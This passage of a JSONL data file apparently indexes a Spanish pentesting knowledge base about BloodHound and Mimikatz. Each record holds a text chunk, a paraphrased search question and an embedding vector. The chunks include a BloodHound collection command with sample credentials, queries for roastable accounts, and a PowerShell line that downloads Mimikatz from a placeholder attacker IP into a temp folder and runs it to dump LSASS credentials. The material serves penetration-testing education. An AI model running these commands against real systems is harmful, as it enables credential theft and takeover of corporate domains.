-0.02383, 0.01478, 0.00516, -0.0882, 0.00808, -0.03319, -0.03159, -0.10391, -0.04881, -0.05903, -0.0566, -0.00296, -0.01325, -0.05373, 0.03233, -0.0443, 0.03896, -0.00916, -0.01142, -0.00734, 0.05127, 0.02811, -0.03622, 0.033, -0.05171, 0.04763, -0.02361, -0.00736, 0.02217, -0.0252, 0.03381, -0.0287, -0.09105, -0.00801, -0.00114, 0.00594, 0.01599, 0.00772, 0.01717, 0.02324, 0.06118, 0.01886, -0.02795, 0.00349, 0.00161, -0.03495, 0.0481, 0.02814, -0.02059, -0.09276, 0.05777, -0.00992, 0.01226, -0.0413, 0.00744, -0.02349, -0.05423, -0.04531, -0.02315, 0.07363, 0.0439, 0.02249, -0.05432, -0.04874, -0.00153, 0.03563, -0.01282, 0.01643, -0.03871, -0.02675, -0.01552, 0.07152, 0.01875, 0.01634, -0.069, 0.02176, 0.03014, -0.0059, 0.00801, 0.04117, 0.0322, 0.02152, -0.00381, -0.01339, -0.01684, 0.0177, 0.01241, -0.01916, -0.03638, -0.03214, 0.07594, 0.03706, -0.0704, -0.04108, -0.03595, -0.04248, -0.00823, -0.06193, -0.06231, -0.02223, -0.02784, 0.0577, 0.0116, -0.06222, 0.0642]} +{"tipo": "pregunta", "herramienta": "BloodHound", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/BloodHound.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# 1) recolectar desde Kali (necesitas creds vΓ‘lidas)\nbloodhound-python -u juan -p 'Password1' -d corp.local -ns 10.10.10.10 -c All", "indexar": "con quΓ© programa monto el grΓ‘fico de confianza de un dominio corporativo?", "v": [-0.01021, 0.04237, -0.01622, -0.14174, 0.0275, -0.10248, 0.13213, -0.01893, -0.23772, -0.1661, 0.08303, 0.04542, -0.05109, -0.11886, -0.04457, -0.04579, 0.18526, -0.09951, -0.05866, -0.03708, 0.0445, -0.17554, 0.08988, -0.10144, 0.08801, -0.03641, -0.04462, -0.08201, 0.03703, 0.14563, 0.16897, -0.05391, 0.07194, -0.01072, -0.03745, -0.01366, 0.09465, 0.06233, 0.07765, 0.01602, 0.04654, -0.07805, -0.10774, -0.01643, 0.04023, -0.09996, 0.00633, -0.03793, 0.0382, -0.05318, -0.011, -0.04506, 0.01645, -0.05162, -0.00668, 0.03006, 0.02214, -0.02952, 0.0556, -0.02334, -0.11462, -0.00846, 0.05087, 0.02232, -0.09328, 0.02907, 0.05066, -0.04155, -0.06969, -0.03312, 0.0778, -0.07284, -0.0093, 0.01138, 0.05106, -0.05849, 5e-05, -0.05314, -0.00616, -0.08766, -0.02255, 0.03031, -0.01603, 0.06164, -0.1228, -0.08726, -0.03379, 0.0266, 0.03679, 0.04354, 0.01262, 0.0359, -0.05139, -0.0039, -0.09686, -0.01555, 0.0623, 0.0091, -0.03166, 0.02349, 0.01215, 0.07219, -0.10912, 0.0265, 0.09735, 0.12812, -0.01135, -0.0188, -0.09334, 0.02538, 0.08698, 0.02763, -0.10024, 0.08272, -0.05289, -0.01288, -0.00028, 0.03363, 0.04288, -0.14315, -0.06011, 0.04568, 0.03832, 0.10215, -0.08264, -0.06421, -0.00533, 0.10073, -0.06115, -0.09867, -0.05234, 0.00458, -0.06216, -0.0236, -0.10636, -0.04418, 0.02586, 0.02951, 8e-05, -0.11659, 0.00557, 0.08179, 0.05673, 0.00821, 0.04997, 0.00301, 0.06493, -0.12775, -0.04566, 0.11266, -0.05665, 0.1047, -0.0797, 0.02407, 0.0118, -0.01733, 0.02461, -0.00539, -0.00869, 0.01564, -0.03765, -0.00922, 0.01309, 0.10818, 0.0652, -0.07982, 0.00024, 0.02191, 0.01116, 0.11572, -0.04617, 0.08235, 0.01634, -0.05101, 0.06059, -0.02588, -0.06137, -0.04146, -0.05403, -0.03282, -0.10203, -0.01888, 0.096, 0.09249, -0.02268, 0.01995, -0.0022, 0.02758, 0.00691, -0.01754, -0.02261, 0.01418, -0.0739, 0.01196, 0.03524, -0.09855, 0.05165, 0.00178, 0.04492, -0.03114, -0.02215, -0.04949, -0.00939, 0.00634, 0.05264, 0.06568, -0.03137, 0.01715, 0.06939, 0.11985, -0.01106, 0.0199, -0.00062, -0.04377, -0.00934, -0.00815, -0.0367, 0.05649, -0.00169, 0.02699, -0.01471, 0.03919, 0.03658, 0.00758, -0.04684, -0.04691, -0.01749, -0.00775, -0.02443, 0.02493, -0.00106, 0.02504, -0.02134, -0.01665, -0.01154, -0.00584, 0.04701, -0.05419, -0.0166, -0.10072, -0.01065, 0.07331, -0.02048, -0.03204, -0.07457, -0.04185, -0.09257, 0.02327, -0.00741, -0.01225, -0.02037, 0.02319, -0.00092, -0.03101, -0.01401, -0.02321]} +{"tipo": "pregunta", "herramienta": "BloodHound", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/BloodHound.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Queries que importan\n- **Find Shortest Paths to Domain Admins**\n- **Find Kerberoastable Accounts** β†’ Kerberoasting\n- **Find AS-REP Roastable Users** β†’ AS-REP Roasting\n- Aristas peligrosas (`GenericAll`, `WriteDACL`, `ForceChangePassword`) β†’ ACL abuses\n\nRelacionado: Mimikatz Β· Movimiento lateral Β· OSCP MOC", "indexar": "que herramienta me sirve para encontrar cuentas roqueables con Kerberos?", "v": [0.07224, -0.06325, -0.0966, -0.05179, 0.05736, -0.22356, -0.03075, 0.13533, 0.01882, -0.17939, -0.17881, -0.0993, 0.06496, -0.11951, 0.2349, 0.05042, -0.09568, 0.01382, 0.0326, 0.06808, 0.08384, -0.10916, -0.13508, 0.00129, -0.08013, -0.0271, 0.06483, -0.03713, -0.12446, 0.08406, 0.0433, 0.0096, -0.04656, -0.06783, -0.04846, -0.09307, -0.02563, 0.0408, 0.02572, 0.02699, 0.07337, 0.03017, -0.0259, 0.1214, 0.0314, 0.02917, -0.06146, 0.07299, -0.01141, 0.17485, 0.00527, -0.10402, -0.16127, 0.0614, -0.12031, -0.15888, 0.17052, -0.02476, -0.05145, -0.00708, -0.15296, -0.05212, -0.04217, -0.06469, 0.05716, -0.01904, 0.05013, 0.00601, 0.0124, -0.0681, -0.09297, 0.01835, 0.05523, 0.0141, -0.06296, -0.02466, 0.11373, 0.01863, -0.08377, -0.0112, -0.00725, -0.09971, -0.06128, 0.0698, -0.05103, -0.04955, 0.09571, -0.02253, 0.09747, -0.01959, -0.04262, -0.00291, -0.06066, 0.03045, -0.07693, 0.02406, 0.00897, 0.01476, -0.05696, -0.08596, 0.05329, -0.0065, -0.10687, -0.00036, -0.01271, 0.06957, -0.00183, -0.06456, -0.05038, -0.02854, 0.08704, 0.00331, 0.00183, -0.00469, 0.01336, 0.11534, -0.03782, -0.06935, -0.00977, -0.01554, 0.04491, 0.05006, -0.04517, -0.01717, -0.03706, -0.03697, -0.02618, 0.09311, -0.00159, -0.02864, 0.04048, -0.04666, -0.03905, 0.01609, -0.03166, 0.00106, -0.0314, -0.10349, -0.01174, -0.02005, -0.0135, 0.09261, -0.06577, -0.08035, 0.01654, 0.04031, 0.07056, 0.0188, 0.03313, -0.03198, 0.05721, -0.01614, -0.0809, 0.05506, -0.07591, -0.01035, 0.01139, 0.0112, -0.10318, 0.00654, -0.07428, -0.04274, 0.03431, 0.01195, 0.03102, -0.06657, -0.01972, 0.06593, 0.07534, 0.04863, -0.01388, 0.02641, 0.11325, -0.03471, -0.03491, -0.11811, 0.00685, -0.01111, -0.01619, -0.03984, -0.03289, -0.01818, 0.01295, -0.04223, 0.00319, -0.06905, 0.07152, -0.04958, 0.01664, 0.00553, -0.01633, 0.03059, -0.01692, -0.04105, -0.01685, -0.0193, 0.02443, -0.03025, 0.00817, -0.0273, -0.02131, 0.05903, -0.06204, 0.02208, 0.06332, 0.12313, -0.04196, 0.00958, -0.02564, 0.03239, 0.06378, -0.02047, 0.05913, -0.04409, 0.00418, -0.03656, 0.01892, 0.00308, -0.01497, 0.09422, 0.00859, -0.01877, 0.06154, -0.0057, 0.02382, 0.02468, -0.01417, -0.07398, -0.01312, -0.01852, 0.01827, -0.05157, -0.02541, 0.0104, -0.03761, -0.03912, 0.04022, 0.01179, -0.00715, -0.00904, -0.01764, 0.02234, 0.02591, -0.00137, -0.06986, -0.00451, -0.01634, 0.00703, -0.04299, -0.07463, 0.01067, 0.01358, 0.02231, -0.00735, 0.01122, -0.03356]} +{"tipo": "pregunta", "herramienta": "BloodHound", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/BloodHound.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Queries que importan\n- **Find Shortest Paths to Domain Admins**\n- **Find Kerberoastable Accounts** β†’ Kerberoasting\n- **Find AS-REP Roastable Users** β†’ AS-REP Roasting\n- Aristas peligrosas (`GenericAll`, `WriteDACL`, `ForceChangePassword`) β†’ ACL abuses\n\nRelacionado: Mimikatz Β· Movimiento lateral Β· OSCP MOC", "indexar": "cual programa detecta usuarios que pueden ser atacados mediante AS-REP Roasting?", "v": [-0.10727, 0.08001, -0.07851, -0.12564, 0.17292, 0.03325, 0.07961, -0.07244, -0.17919, 0.08975, -0.09497, -0.12278, -0.01879, -0.01362, 0.28658, -0.10359, -0.07044, 0.09983, 0.09773, 0.07972, -0.03165, -0.1651, -0.05621, 0.06793, 0.07606, 0.10738, 0.01617, -0.00986, 0.05475, -0.036, 0.07357, -0.06031, -0.02375, 0.0014, -0.12556, -0.02064, 0.01983, 0.00714, 0.0759, 0.18315, 0.03186, -0.03929, -0.2488, -0.09446, 0.1374, 0.00657, -0.01734, -0.07804, -0.04816, 0.0605, -0.01531, 0.08189, -0.12516, -0.04886, 0.04986, -0.08658, 0.0868, -0.03757, -0.03492, -0.05583, 0.00255, 0.06919, 0.09088, -0.04303, -0.01849, -0.05523, 0.08188, -0.02353, -0.0052, -0.04651, 0.01695, 0.01202, 0.00164, -0.01207, 0.0169, 0.06374, -0.04055, 0.00727, 0.10545, -0.12421, -0.0093, -0.04511, -0.04332, 0.10792, -0.03929, -0.04447, 0.08067, 0.01276, 0.03249, -0.12492, 0.06937, 0.05733, 0.03934, 0.08777, 0.04439, -0.08452, 0.09611, -0.0497, 0.04451, 0.06555, -0.00162, -0.00894, -0.07796, 0.08072, -0.01657, 0.04833, 0.01961, -0.02947, 0.0358, -0.07156, -0.00964, -0.06009, -0.05008, -0.07269, -0.0206, -0.00204, -0.00613, -0.01471, 0.08244, -0.06402, -0.0724, 0.05322, -0.02035, 0.02694, 0.10528, 0.00861, -0.00397, 0.03061, -0.06407, 0.00544, -0.00625, -0.00083, -0.02825, 0.00169, -0.04742, -0.08635, -0.02994, -0.05483, -0.04299, -0.01107, 0.03497, 0.03475, 0.02688, 0.05931, 0.03195, -0.05593, -0.02734, -0.06621, -0.06118, 0.09517, 0.01347, 0.05111, -0.08692, 0.07172, -0.07192, -0.02678, -0.02619, -0.01159, -0.1025, 0.0569, -0.05778, -0.00392, 0.02687, -0.02461, 0.08743, -0.01148, 0.0003, 0.00297, 0.13416, 0.05099, -0.03233, 0.04163, 0.02771, -0.01203, -0.03017, 0.00262, -0.04276, -0.09193, 0.01313, -0.032, -0.05264, -0.00872, 0.05168, 0.03945, -0.07848, -0.05255, -0.02607, 0.04501, 0.01645, -0.00884, 0.02614, 0.01416, 0.00774, 0.01481, 0.04695, -0.06107, -0.01189, -0.0062, -0.00852, 0.00278, -0.05656, 0.01645, -0.00085, -0.04117, 0.01771, 0.00065, 0.02957, -0.04495, 0.0572, 0.05609, 0.03103, -0.04995, 0.03828, -0.02963, -0.05276, -0.00928, 0.03423, -0.01891, 0.00783, 0.04821, -0.00309, -0.03298, 0.09398, 0.05326, -0.02259, -0.00396, 0.00332, 0.03783, 0.02939, 0.00159, 0.03156, -0.04933, -0.00245, -0.08636, -0.01108, -0.03845, -0.01578, -0.00292, 0.00051, -0.03181, -0.00597, 0.05573, -0.0043, -0.02416, 0.00556, 0.00627, -0.05752, -0.0228, 0.00623, -0.02218, -0.0455, 0.05227, 0.0022, -0.04307, 0.06532, -0.02677]} +{"tipo": "pregunta", "herramienta": "BloodHound", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/BloodHound.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Queries que importan\n- **Find Shortest Paths to Domain Admins**\n- **Find Kerberoastable Accounts** β†’ Kerberoasting\n- **Find AS-REP Roastable Users** β†’ AS-REP Roasting\n- Aristas peligrosas (`GenericAll`, `WriteDACL`, `ForceChangePassword`) β†’ ACL abuses\n\nRelacionado: Mimikatz Β· Movimiento lateral Β· OSCP MOC", "indexar": "con que puedo identificar privilegios peligrosos como GenericAll o ForceChangePassword en un dominio?", "v": [-0.08829, 0.05929, 0.04572, -0.06131, -0.03752, 0.05219, 0.15304, -0.05241, -0.14195, 0.01101, 0.17433, 0.02019, -0.11698, 0.00799, -0.01369, 0.06605, 0.08015, -0.00263, -0.15649, -0.01202, -0.02601, -0.16943, 0.05312, -0.12398, 0.08639, -0.1083, -0.06166, -0.01272, -0.06897, 0.00296, 0.00507, 0.02789, 0.08281, -0.05087, -0.01579, -0.01376, -0.03268, 0.14123, 0.11994, 0.12755, 0.12553, 0.03653, -0.18438, 0.05242, 0.09024, -0.02253, -0.09875, 0.08221, 0.07574, -0.05291, 0.04053, -0.08746, -0.11179, -0.10637, 0.00064, -0.01981, 0.06294, 0.08028, -0.1686, 0.00737, -0.14861, -0.08409, 0.03486, 0.01717, -0.04056, -0.06077, -0.04246, 0.03709, -0.06208, -0.03082, -0.0441, -0.07982, 0.02187, -0.00849, -0.01403, -0.10685, 0.05079, -0.06291, 0.10319, -0.00918, 0.01812, 0.00776, -0.09343, 0.0067, -0.08455, -0.08452, -0.06121, -0.11335, 0.05153, -0.04672, 0.12814, 0.00017, 0.0182, 0.0257, 0.03684, 0.04464, 0.00171, -0.03995, -0.1298, -0.00076, 0.10714, 0.11014, -0.04905, 0.11811, 0.06844, 0.01008, -0.03977, -0.09663, 0.0306, -0.04804, -0.04729, -0.07566, 0.04042, 0.0002, 0.01856, 0.08801, -0.05996, -0.00742, 0.06712, -0.05205, -0.05069, -0.07644, 0.04382, -0.06052, 0.01344, 0.01043, -0.0504, 0.00397, -0.04162, -0.07652, -0.08913, -0.00723, -0.05698, -0.0598, 0.01065, 0.01573, 0.0811, -0.06133, -0.03875, -0.01275, 0.02834, 0.04346, -0.00571, 0.05957, 0.00907, -0.04439, 0.00546, -0.07537, -0.03581, 0.0449, -0.06957, -0.01441, 0.00859, 0.09053, -0.00824, 0.08265, -0.05612, 0.01074, -0.02734, 0.08598, -0.00191, 0.07381, -0.02385, -0.05039, 0.03683, 0.04376, 0.0234, -0.00815, -0.04468, -0.07066, -0.02343, -0.01281, 0.05317, -0.02094, -0.02944, -0.06104, -0.0335, -0.00908, 0.06413, -0.04082, -0.05459, -0.01775, -0.03427, 0.06701, -0.00476, -0.02354, 0.02857, 0.01812, 0.00683, 0.07502, -0.00968, 0.09467, -0.00521, 0.05296, -0.06949, -0.04631, -0.03559, 0.01013, -0.00921, -0.06286, 0.00966, -0.05809, -0.016, 0.0088, 0.03309, -0.07451, 0.06249, -0.01385, -0.01658, 0.03145, -0.04622, -0.06473, 0.08183, -0.07504, -0.00225, 0.01683, 0.00435, -0.03816, -0.06147, -0.01897, -0.03232, 0.05273, 0.07134, -0.01002, 0.02246, 0.01584, -0.01532, -0.08425, 0.09542, 0.01758, -0.02006, 0.00129, -0.06827, -0.06195, 0.09995, -0.01246, -0.01401, -0.04891, -0.03318, 0.0151, -0.0339, -0.00937, 0.05775, -0.07412, -0.05522, -0.08545, -0.06727, 0.0308, -0.04631, -0.04563, 0.01518, -0.03234, 0.03165, -0.01271, -0.02243, -0.04427]} +{"tipo": "pregunta", "herramienta": "Mimikatz", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Mimikatz.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# Mimikatz\n\n> Un **.exe que corre DENTRO de la vΓ­ctima Windows** (no en Kali). Lee la memoria de **LSASS** y vuelca credenciales. En `tu carpeta`.", "indexar": "que programa hay para leer las credenciales desde la memoria del Windows?", "v": [-0.10684, 0.02019, 0.01171, -0.11165, 0.05633, -0.02862, -0.03974, 0.06851, -0.07234, -0.16836, -0.01735, 0.05038, -0.01657, -0.1312, -0.01036, 0.05099, 0.04613, -0.01043, 0.03396, -0.00818, -0.03348, -0.0495, -0.0547, 0.08758, -0.05556, 0.05095, 0.03611, -0.0178, 0.04803, 0.06754, 0.00581, 0.02666, 0.02307, -0.08205, 0.02622, 0.12305, -0.01969, 0.04897, 0.01724, 0.14944, 0.02736, 0.1126, 0.05668, 0.10834, 0.14464, -0.08235, 0.05023, 0.01809, 0.02829, -0.09704, -0.04348, 0.00761, 0.10262, -0.04695, 0.13599, -0.02972, -0.04203, -0.04021, -0.04275, -0.0528, -0.0322, 0.12788, 0.0323, 0.01888, 0.09853, 0.02249, 0.09747, -0.01939, -0.04177, 0.17467, -0.14118, -0.06015, 0.06342, 0.00644, -0.00905, 0.02742, -0.01033, -0.00361, 0.11618, -0.02855, 0.02494, -0.0368, 0.03305, -0.01401, 0.06678, 0.01203, -0.0275, 0.01867, -0.00125, -0.02056, 0.01391, 0.10845, -0.08045, 0.2033, 0.0822, -0.06841, 0.06622, 0.05358, 0.05034, 0.12451, -0.0004, -0.13681, -0.02217, 0.15638, -0.00772, 0.10022, 0.00908, 0.00159, -0.10534, -0.00472, 0.05076, 0.01648, -0.06354, 0.00241, -0.0853, 0.0341, 0.09779, -0.03441, 0.09285, -0.00319, -0.06327, -0.03322, -0.07069, 0.00688, 0.03604, 0.00785, -0.11257, 0.09109, -0.11189, 0.035, 0.00249, 0.09602, -0.01958, -0.09237, -0.06958, -0.01062, -0.02461, 0.04236, 0.0044, -0.04629, 0.10516, 0.0816, 0.0225, -0.00013, -0.07658, 0.02154, 0.06124, 0.04858, 0.01094, -0.03666, 0.04269, 0.03885, 0.02596, 0.00342, -0.03661, -0.00114, 0.06667, 0.05035, -0.01568, 0.022, -0.12308, 0.00814, -0.00123, -0.04788, 0.04862, -0.09188, -0.06447, 0.09488, 0.11059, 0.05549, -0.04898, -0.00567, -0.02483, -0.05176, 0.02049, 0.0137, 0.00338, -0.06573, -0.01634, -0.0192, -0.10309, 0.01083, 0.04238, 0.01084, -0.0606, -0.05806, -0.0501, 0.07245, -0.02485, -0.0412, -0.03387, -0.04799, 0.08329, -0.02229, 0.03908, -0.04486, -0.06459, 0.0177, 0.08328, 0.04449, -0.11515, 0.0604, -0.0282, 0.01302, 0.08608, 0.12463, -0.00545, 0.037, 0.06194, 0.09978, -0.00429, -0.06027, 0.00291, -0.01985, -0.05042, -0.05065, -0.00271, 0.03156, 0.00588, -0.00328, 0.04895, 0.02585, 0.05537, 0.04437, -0.10799, -0.11367, -0.03718, 0.05283, 0.00277, 0.00317, -0.00988, 0.01644, -0.00459, -0.03199, 0.03605, 0.01579, -0.03001, -0.02813, -0.02458, -0.04477, -0.08454, 0.0457, -0.06394, -0.0638, -0.10999, -0.00332, -0.00671, 0.0414, 0.05504, -0.04341, -0.00914, 0.0198, 0.03697, -0.05452, -0.00399, 0.02609]} +{"tipo": "pregunta", "herramienta": "Mimikatz", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Mimikatz.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# Mimikatz\n\n> Un **.exe que corre DENTRO de la vΓ­ctima Windows** (no en Kali). Lee la memoria de **LSASS** y vuelca credenciales. En `tu carpeta`.", "indexar": "cual es una herramienta que inyecte un proceso dentro de un sistema Windows para extraer datos?", "v": [-0.00985, 0.12422, -0.05754, -0.1372, 0.09368, -0.11485, -0.07302, -0.11575, -0.04721, -0.07926, -0.15374, -0.11925, -0.10108, -0.08712, -0.04266, 0.03425, 0.08318, -0.13316, -0.03595, -0.06991, -0.1109, -0.03951, -0.08605, -0.02429, -0.14972, 0.05699, -0.0254, 0.01132, -0.21629, 0.092, 0.00207, 0.01807, 0.05485, -0.08602, -0.06896, -0.0463, -0.01576, 0.10499, -0.00066, 0.02789, 0.03056, 0.03896, -0.09056, 0.09126, 0.03766, -0.03293, 0.04324, 0.00882, 0.12017, -0.04989, -0.09056, -0.07162, -0.07267, -0.00484, 0.05581, -0.17588, 0.14331, -0.10343, 0.04009, -0.03202, -0.06364, 0.12998, -0.03874, -0.03563, -0.02126, -0.01796, 0.04448, -0.07723, -0.0313, 0.13629, -0.04076, 0.04909, 0.08377, -0.05416, 0.02296, -0.00711, 0.00714, 0.02619, 0.03217, -0.03036, -0.00586, 0.04811, -0.08476, 0.00426, 0.02769, -0.07952, 0.10977, -0.01192, 0.04611, -0.09592, 0.09374, -0.04646, -0.0451, 0.09758, 0.09255, -0.01914, 0.05137, -0.04649, -0.04306, 0.05441, 0.04039, -0.08569, -0.14223, 0.15644, -0.05521, 0.04765, -0.00642, -0.03318, -0.089, -0.11161, -0.01085, 0.06931, -0.03218, -0.00782, -0.03968, 0.00451, -0.01383, -0.04726, -0.08382, 0.0002, -0.02115, 0.0318, -0.04919, -0.09095, 0.01448, -0.09901, -0.07078, 0.07033, -0.0479, -0.03683, 0.04381, 0.00866, -0.1134, -0.00824, -0.01622, -0.00428, -0.00747, -0.055, 0.06191, -0.08593, 0.0333, 0.02701, 0.00351, -0.04167, 0.06367, -0.00888, 0.08125, 0.04763, -0.04281, -0.0794, 0.02169, -0.01022, 0.018, 0.01007, -0.09916, 0.00279, -0.01324, -0.00969, -0.03601, -0.03556, -0.02586, -0.00768, 0.04307, 0.02269, -0.00345, -0.03252, -0.0079, -0.00249, 0.06422, -0.0213, 0.0203, 0.00796, 0.04895, -0.0159, 0.03191, 0.00511, -0.02499, -0.11079, 0.00678, -0.04366, -0.05933, 0.038, 0.00489, -0.0536, -0.00718, -0.00686, -0.01187, -0.00896, -0.05059, 0.03161, 0.01304, 0.0859, 0.0357, -0.07894, -0.00323, -0.0099, -0.04992, -0.05507, 0.08483, -0.00699, -0.09371, 0.06226, 0.01689, -0.06379, -0.00157, 0.08985, -0.00132, -0.02324, 0.04629, 0.01894, 0.03389, 0.01796, 0.06228, -0.02309, -0.07973, -0.03005, 0.02593, -0.00602, -0.01468, -0.04458, 0.02767, 0.03372, 0.1278, 0.01455, -0.06807, -0.01115, -0.01066, 0.06913, -0.02599, -0.04399, 0.01121, -0.02569, 0.02178, -0.00324, 0.03351, -0.01481, 0.01097, -0.08627, -0.07008, -0.08337, 0.0484, 0.07158, -0.01983, -0.06604, -0.03801, -0.0398, -0.05522, 0.02389, 0.00076, -0.14753, -0.03708, -0.02764, 0.03435, -0.04941, 0.02646, -0.01564]} +{"tipo": "pregunta", "herramienta": "Mimikatz", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Mimikatz.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Subir y ejecutar\n```powershell\niwr http://TU_IP/mimikatz/x64/mimikatz.exe -OutFile C:\\Windows\\Temp\\m.exe # Transferencia de ficheros\nC:\\Windows\\Temp\\m.exe\n```", "indexar": "que herramienta se usa para descargar y ejecutar archivos ejecutables directamente en PowerShell?", "v": [0.00056, -0.02519, -0.0802, -0.16101, 0.06733, -0.0507, -0.02563, -0.02634, 0.02394, -0.09808, -0.2906, 0.00692, -0.01265, -0.02192, 0.04906, 0.01977, 0.04342, -0.04103, -0.02403, -0.05095, -0.00663, 0.03802, -0.10067, -0.09399, -0.11146, 0.09533, -0.05482, 0.17959, -0.23493, -0.03151, -0.03014, 0.05334, 0.08659, -0.15351, -0.00751, 0.07994, -0.09696, 0.05541, 0.01397, 0.138, -0.03882, 0.15227, -0.16957, 0.06413, -0.0264, -0.00788, 0.07573, -0.05934, 0.00484, -0.01982, -0.03401, -0.06431, -0.1779, -0.02006, 0.00838, -0.16703, 0.07165, -0.20192, -0.01733, -0.03477, -0.09282, 0.02745, -0.00715, 0.00059, -0.00846, 0.05497, -0.03796, -0.10821, -0.05793, 0.10041, -0.04923, 0.06899, 0.07804, 0.0705, -0.04403, -0.0574, 0.03257, -0.01505, -0.00447, 0.02189, 0.02393, -0.13325, -0.10085, 0.01033, -0.06994, -0.05527, -0.03677, -0.08023, 0.01466, -0.00634, 0.08016, 0.00531, -0.05099, 0.08519, 0.04516, -0.02894, 0.03638, -0.01978, 0.01773, -0.00813, 0.08409, -0.07809, -0.025, 0.06383, 0.0932, 0.04055, -0.05338, 0.09107, -0.02684, -0.04499, 0.03228, 0.00733, 0.07703, 0.01396, -0.08213, 0.01992, -0.03866, -0.10129, -0.04513, -0.05289, -0.07456, 0.07313, -0.09158, 0.00379, -0.00409, -0.0496, -0.00813, 0.03012, -0.04668, -0.0349, 0.03905, -0.09164, -0.0307, 0.01282, -0.0393, -0.00742, 0.04608, -0.06446, -0.04421, -0.17012, 0.10904, 0.00602, -0.01581, -0.01383, 0.0659, 0.00563, -0.02619, -0.03516, 0.02419, 0.02028, 0.09099, -0.01318, -0.02247, -0.00733, -9e-05, -0.03728, -0.01557, 0.01037, -0.06159, 0.02765, -0.05342, -0.01119, -0.01755, -0.02943, -0.03908, -0.04417, -0.02827, 0.03445, 0.03171, 0.04841, 0.06877, 0.05845, -0.0066, -0.01863, 0.02394, -0.04094, -0.03492, 0.00036, 0.04036, -0.02229, -0.04485, -0.00795, -0.00502, -0.02279, -0.04647, 0.01215, 0.05737, -0.0201, -0.05121, 0.08872, -0.03555, 0.02888, -0.00123, -0.08222, 0.03922, 0.01884, -0.0204, 0.00272, -0.05457, -0.04876, -0.07334, -0.04741, -0.04368, 0.00477, 0.06323, 0.04779, 0.01411, 0.02169, -0.0725, 0.00559, 0.01395, 0.03872, 0.08307, -0.01868, -0.00726, -0.0475, 0.01869, 0.00949, 0.03778, 0.04504, -0.08193, 0.00325, 0.12339, -0.01975, 0.0123, 0.02334, -0.01181, -0.00578, -0.05557, 0.0099, -0.02196, 0.04065, 0.00425, -0.01577, 0.02971, -0.03527, 0.00823, 0.00254, -0.04723, -0.03093, 0.01431, 0.06223, 0.01772, -0.01865, -0.06345, 0.00105, -0.0107, -0.04201, 0.0213, -0.05629, 0.01818, 0.03563, 0.02262, -0.02271, -0.0028, -0.03989]} +{"tipo": "pregunta", "herramienta": "Mimikatz", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Mimikatz.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Subir y ejecutar\n```powershell\niwr http://TU_IP/mimikatz/x64/mimikatz.exe -OutFile C:\\Windows\\Temp\\m.exe # Transferencia de ficheros\nC:\\Windows\\Temp\\m.exe\n```", "indexar": "cual es el comando para transferir un archivo desde una URL a la carpeta temporal y luego ejecutarlo?", "v": [0.10203, -0.01566, -0.07853, -0.05588, -0.0141, -0.10046, 0.16997, 0.07928, -0.02071, 0.04095, -0.16774, -0.0996, 0.08343, 0.00359, -0.0097, 0.04821, 0.177, -0.02709, 0.12407, -0.14138, 0.05229, 0.05979, 0.10348, -0.03676, -0.10958, 0.0288, 0.03864, 0.01652, -0.19025, -0.07502, 0.01498, 0.07614, 0.15388, -0.04988, 0.03553, 0.0919, 0.04488, 0.07353, -0.16284, 0.13662, 0.01774, 0.12774, -0.19156, 0.09134, -0.06108, -0.1094, 0.04065, -0.02236, 0.04508, -0.02998, 0.02687, -0.00237, -0.09969, -0.04083, -0.08129, -0.04553, 0.13793, -0.15308, 0.0604, 0.05396, -0.03006, -0.06708, -0.06083, 0.13695, -0.05009, -0.05007, -0.07584, -0.05801, -0.14158, 0.08275, -0.10622, 0.11175, 0.05642, 0.09678, -0.05384, -0.06359, -0.08081, -0.10742, -0.00839, -0.01888, -0.01257, 0.01933, -0.02552, 0.06193, -0.03434, -0.04244, -0.04939, -0.05361, -0.00918, 0.00861, 0.00701, -0.08084, 0.01015, 0.02488, 0.05838, -0.0257, -0.04904, 0.02315, 0.03212, -0.01581, -0.01012, -0.008, -0.09686, 0.14172, 0.0919, 0.10296, 0.01011, 0.04235, 0.00513, 0.02046, 0.05417, -0.02134, 0.08116, 0.04751, -0.0097, -0.04169, -0.00511, -0.07327, -0.01761, -0.04898, -0.1244, -0.00185, -0.01552, 0.12519, -0.00395, -0.03455, 0.00359, 0.00269, -0.01789, 0.03628, -0.06146, 0.01475, -0.00996, -0.10518, -0.06515, 0.08004, 0.07289, -0.00931, -0.00948, -0.09812, -0.00739, 0.00931, 0.01599, 0.06694, 0.04206, 0.03672, 0.01621, -0.04006, -0.0234, -0.02819, 0.05436, 0.0575, -0.04962, 0.01048, -0.04726, -0.02043, -0.01735, -0.011, -0.1035, -0.05206, -0.00149, 0.00873, 0.00218, 0.01393, 0.02021, -0.07319, -0.02217, 0.01966, 0.01509, 0.03275, 0.00932, -0.01837, -0.07837, -0.04107, -0.00383, -0.04279, -0.01342, -0.05649, 0.05269, 0.05219, 0.01174, 0.01896, 0.04088, 0.03831, -0.01101, -0.07357, 0.0339, 0.03619, -0.07037, 0.05934, -0.01155, 0.04435, -0.00353, 0.02035, 0.03427, -0.01768, -0.02421, -0.02107, -0.06928, 0.03964, -0.07322, -0.02104, 0.00073, -0.05541, 0.04565, -0.01016, -0.05587, 0.03871, -0.07234, 0.02071, -0.00455, 0.03285, 0.10155, -0.01913, -0.01532, 0.00116, -0.01568, 0.0205, -0.02183, -0.01715, 0.01149, 0.02252, 0.06066, -0.02548, 0.0081, 0.01779, 0.00067, 0.031, -0.00958, -0.00904, -0.01352, 0.06334, 0.03497, -0.02592, 0.06013, -0.01264, -0.0236, -0.01192, 0.03067, -0.00722, -0.01874, 0.04364, -0.04877, -0.02182, -0.03336, -0.00714, -0.11805, 0.02705, -0.03575, -0.11287, -0.0335, -0.02465, 0.02023, 